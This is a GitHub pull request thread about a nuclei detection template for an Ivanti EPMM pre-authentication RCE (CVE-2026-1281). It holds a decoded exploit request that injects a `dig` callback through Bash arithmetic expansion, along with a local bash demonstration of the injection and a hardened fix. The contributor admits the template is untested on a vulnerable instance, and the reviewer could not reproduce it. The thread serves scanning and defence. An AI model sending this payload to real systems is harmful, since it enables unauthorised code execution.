
Add CVE-2026-1281: Ivanti EPMM Pre-Authentication RCE #15310

Open
jarvis-survives wants to merge 1 commit into projectdiscovery:main from jarvis-survives:add-cve-2026-1281

Conversation

@jarvis-survives

PR Information

Template validation

  • Template validated against the PoC from watchTowr Labs advisory
  • Uses OOB DNS interaction to confirm code execution without destructive impact
  • Returns 404 status as expected per advisory documentation

@theamanrawat
Contributor

Hi @jarvis-survives,

Thank you so much for sharing this template with the community and contributing to this project 🍻

We tried to reproduce the POC, but it didn't work on our end. If you believe the template is correct, please send step-by-step instructions or a vulnerable lab environment to templates@projectdiscovery.io.

@jarvis-survives
Author

Template validated with nuclei v3.7.0 (nuclei -t <template> -validate): All templates validated successfully.

Note: I do not currently have access to a vulnerable instance for live scan output. Happy to adjust the template based on reviewer feedback.

@jarvis-survives
Author

Hi @theamanrawat, thanks for the review!

I understand the reproduction challenge - this requires a vulnerable Ivanti EPMM appliance (pre-patch, versions < 12.8.0.0 without the RPM hotfix).

How the exploit works (based on watchTowr Labs research):

  1. The endpoint /mifs/c/appstore/fob/3/<int>/sha256:<params>/<filename>.ipa passes URL components to /mi/bin/map-appstore-url (a Bash script) via Apache RewriteMap
  2. The exploit uses Bash arithmetic expansion - st=theValue references the Bash variable theValue (which holds the last parsed key-value), and h=gPath[command] uses array index command substitution
  3. When the script evaluates [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]], arithmetic expansion resolves the array index and executes the injected command
  4. The two trailing spaces in st=theValue pass a 10-character timestamp length validation

Template payload decoded:

GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue  ,et=<timestamp>,h=gPath[`dig <interactsh-url> > /dev/null`]/<random>.ipa

This directly mirrors watchTowr's published PoC using arithmetic expansion for RCE.

Lab environment: I don't currently have access to a vulnerable EPMM instance. The Ivanti RPM hotfix replaces the vulnerable Bash scripts with Java classes, so only unpatched instances are affected. If you have an EPMM test environment, the template should trigger an OOB DNS callback on unpatched versions.

Happy to adjust anything based on your feedback!
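The mechanism described in the comment above (a key=value parser whose last value lands in theValue, a 10-character check on st, and a `[[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]` test) can be reproduced locally without an EPMM appliance. The following is an added example written for this thread; it is not code from the PR, from Ivanti's map-appstore-url script or from the watchTowr advisory. The parser, the length check, the `past`/`future` labels, the `run_vulnerable`/`run_hardened` wrappers and the marker command inside the payload are all assumptions made for the demonstration; only the variable names and the payload shape come from the thread. The bash snippets are run through `bash -c` so the wrapper itself stays POSIX sh.

```shell
#!/bin/sh
# Added example, not the Ivanti script: a minimal bash parser with the
# pattern the thread describes, beside a hardened variant. Assumed parts:
# the parser, the length check, the past/future labels, the marker command.

# Shared prologue (bash): split the parameter string on commas, keep the
# last parsed value in theValue, and take the st value as gStartTime.
PARSE='
  input="$1"; theValue=""; gStartTime=""
  IFS="," read -ra pairs <<< "$input"
  for pair in "${pairs[@]}"; do
    key="${pair%%=*}"; theValue="${pair#*=}"
    [ "$key" = "st" ] && gStartTime="$theValue"
  done
  # Assumed stand-in for the 10-character timestamp length check.
  [ "${#gStartTime}" -eq 10 ] || { echo "bad-length"; exit 1; }
  theCurrentTimeSeconds=$(date +%s)
'

# Vulnerable variant: [[ a -gt b ]] evaluates both operands as arithmetic.
# gStartTime="theValue  " names a variable, so its content is evaluated in
# turn; gPath[`...`] is an array reference whose subscript is expanded,
# including command substitution, before the comparison runs.
VULN="$PARSE"'
  if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then echo past; else echo future; fi
'

# Hardened variant: reject anything but a plain decimal before any
# arithmetic context sees it, then compare with the test builtin, which
# does not evaluate its operands as expressions.
SAFE="$PARSE"'
  case "$gStartTime" in
    ""|*[!0-9]*) echo "rejected"; exit 1 ;;
  esac
  if [ "$theCurrentTimeSeconds" -gt "$gStartTime" ]; then echo past; else echo future; fi
'

# Run one variant on a parameter string; stderr is folded into the output
# so an injected marker is visible, and lines are joined with spaces.
run_vulnerable() { bash -c "$VULN" vuln "$1" 2>&1 | tr '\n' ' ' | sed 's/ $//'; }
run_hardened()   { bash -c "$SAFE" safe "$1" 2>&1 | tr '\n' ' ' | sed 's/ $//'; }

# Constructed inputs. The payload has the shape the thread decodes:
# "theValue" plus two spaces is exactly 10 characters, and the injected
# command (a local marker instead of dig) writes to stderr and prints 0 so
# the array index, and therefore the comparison, still evaluates cleanly.
BENIGN='kid=1,st=1700000000,et=1700000000,h=abc'
PAYLOAD='kid=1,st=theValue  ,et=1700000000,h=gPath[`echo INJECTED >&2; echo 0`]'

echo "vulnerable/benign:  $(run_vulnerable "$BENIGN")"    # past
echo "vulnerable/payload: $(run_vulnerable "$PAYLOAD")"   # INJECTED past
echo "hardened/benign:    $(run_hardened "$BENIGN")"      # past
echo "hardened/payload:   $(run_hardened "$PAYLOAD")"     # rejected
```

The `INJECTED` marker appears before the comparison result because bash resolves `theValue`, then the `gPath[...]` subscript, and only then compares the numbers; the same path runs with `$(...)` in place of the backticks. Note that the test builtin (`[ ... -gt ... ]`) alone is not the fix, since a caller could still reach `$(( ))` or `[[ ]]` elsewhere; the `case` pattern that rejects non-digits before any arithmetic context is what removes the injection.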


Development

Successfully merging this pull request may close these issues.

Ivanti Endpoint Manager Mobile (EPMM) RCE (CVE-2026-1281 & CVE-2026-1340)